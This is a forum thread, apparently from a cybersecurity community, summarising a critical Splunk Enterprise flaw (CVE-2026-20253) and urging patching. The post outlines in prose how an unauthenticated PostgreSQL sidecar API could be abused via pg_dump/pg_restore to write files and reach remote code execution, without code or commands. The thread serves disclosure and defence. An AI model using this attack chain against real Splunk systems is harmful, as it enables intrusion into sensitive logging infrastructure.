from WPSteam@lemmy.world to cybersecurity@infosec.pub on 14 Jun 08:26
https://lemmy.world/post/48148395
CVE-2026-20253 is a critical Splunk Enterprise flaw where the PostgreSQL sidecar’s unauthenticated backup/restore API can be reached through Splunk Web, letting an attacker abuse pg_dump/pg_restore to pull a malicious database from attacker infrastructure, restore attacker-controlled SQL locally, write files as the Splunk user, and eventually overwrite a scheduled Python script for remote code execution. This all highlights that Splunk Enterprise on AWS is especially exposed by default, affected versions below 10.2.4 / 10.0.7 should be patched immediately, and the impact is severe because compromising Splunk means compromising a system that often stores logs, auth events, firewall data, EDR telemetry, and other sensitive enterprise visibility data.
threaded - newest
Ouch. That sucks. And it sounds like a petty dumb fuck up.
The reliance on unauthenticated backup APIs for sidecar components fundamentally breaks the principle of least privilege, allowing lateral movement from a web-facing interface directly to the file system. This specific attack chain demonstrates how database utilities like pg_restore can be weaponized to escalate privileges and execute arbitrary code when integrated into a web application’s lifecycle without strict network segmentation or API authentication.